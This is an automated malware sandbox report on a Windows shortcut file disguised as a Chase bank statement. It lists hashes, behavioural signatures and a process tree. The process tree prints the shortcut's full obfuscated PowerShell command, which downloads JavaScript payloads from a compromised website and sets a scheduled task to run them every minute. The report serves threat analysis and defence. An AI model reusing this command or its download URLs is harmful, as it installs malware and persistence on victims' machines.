Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/03/2025, 17:10
Static task
static1
Behavioral task
behavioral1
Sample
chase_statement_march lnk.lnk
Resource
win7-20240903-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
chase_statement_march lnk.lnk
Resource
win10v2004-20250314-en
15 signatures
150 seconds
General
-
Target
chase_statement_march lnk.lnk
-
Size
1KB
-
MD5
202ee916a0113699880cc2e48a73d353
-
SHA1
85d9b74b2afa5bf0320e746a2871ef614159db2e
-
SHA256
02f27282ecc90843bd932d731c87426f78e4f88d79c66374ae06c6d1641c73cb
-
SHA512
c729137c2680e98e9686d6a2368e184fc38897032d0d0bf1e1c5a84530cc45208bfc60085be768c027d4ce52b627a7f308458ac5ed480c32289bc5a0d7c0a35e
Score
6/10
Malware Config
Signatures
-
pid Process 2844 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2528 wrote to memory of 2844 2528 cmd.exe 31 PID 2528 wrote to memory of 2844 2528 cmd.exe 31 PID 2528 wrote to memory of 2844 2528 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\chase_statement_march lnk.lnk"1⤵
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $pdw = $env:programdata + '\' + ('htphwirvsci9k5.js jycqenaew'); $getf='Dow'+'nl'+'oadF'+'ile'; $x5yd46kp30cefn911gg = New-Object Net.WebClient; $wscs = 'wscript '; $x5yd46kp30cefn911gg.$getf('https://casettalecese.it/wp-content/uploads/2022/10/hemigastrectomySDur.php', 'htphwirvsci9k5.js'); . ('curl.e'+'xe') -s -o cs5c09hr6xij 'https://casettalecese.it/wp-content/uploads/2022/10/bivalviaGrr.php'; mv cs5c09hr6xij 'jycqenaew.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $pdw) /tn jycqenaew;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-